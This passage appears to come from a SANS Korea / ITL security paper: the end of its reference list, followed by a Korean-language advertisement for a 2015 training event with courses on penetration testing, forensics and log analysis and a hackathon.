attempts by url [Online forum comment]. Retrieved from http://www.projecthoneypot.org/ip_184.107.208.242 Tilbury, C. (2011, February 11). Computer forensics how-to: Microsoft log parser. Retrieved from http://computer-forensics.sans.org/blog/2011/02/10/computerforensics-howtomicrosoft-log-parser urlquery. (2012, May 07). urlquery. Retrieved from http://urlquery.net/report.php?id=51769 Various. (2006). Lines of evidence: homologies. Retrieved from http://evolution.berkeley.edu/evosite/lines/iihomologies.shtml Wustrow, E., Karir, M., Bailey, M., Jahanian, F., & Huston, G. (2010). In M. Allman(Chair). Internet background radiation revisited. In Proceedings of the 10 th annual conference on Internet measurement (pp. 62-74). New York, NY:Association for Computing Machinery. Zalewski, M. (2012). The tangled web. (p. 256). San Francisco: no starch press. 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 35

Cyber Security Summer 2015 사이버보안전문교육및역량평가전문기관 ITL은 2013년, 2014년에이어국내최고의전문가가참여하는최신의 Cyber Security Summer 2015 사이버보안교육행사를개최합니다. 본행사는침투시험기술과, 침입탐지기술, 윈도침해사고포렌식기술등을배울수있는교육과정이개설되며, 시스템을대상으로해킹하면서배운내용을익힐수있는해커톤프로그램이개설됩니다. 코스를놓치지마십시요! 2015년 8월 26일 ~ 29일, 서울강남구삼성동코엑스 2015년 8월 26일 ( 수 ), 1일교육과정 - M210: 메타스플로이트를이용한침투시험 2015년 8월 27일 ( 목 ) 28일 ( 금 ), 2일교육과정 - M250: 웹애플리케이션침투시험기법 - M300: 윈도침해사고포렌식분석 ( 업데이트!) - M330: 침입탐지를위한로그분석방법 ( 업데이트!) 2015년 8월 29일 ( 토 ) - 해커톤 : 실제시스템대상침투시험시행 ITL 아카데미 ITL 아카데미는사이버보안전문분야에대해서여러개의과정을동시에수강해서분야별전문가를양성하는과정입니다. ITL 아카데미는최소 10명에서최대 20명의수강생으로교육이진행됩니다. 교육진행방식은기존의 ITL 교육과동일하게진행됩니다. ITL 교육, 국내외 SANS 교육및 GIAC 자격증과관련사항은아래로문의바랍니다. 전화 : 031)717-1447 이메일 : itl@itlkorea.kr, sans@sans.or.kr 2015 SANS 코리아 / ITL www.sans.or.kr www.itlkorea.kr 36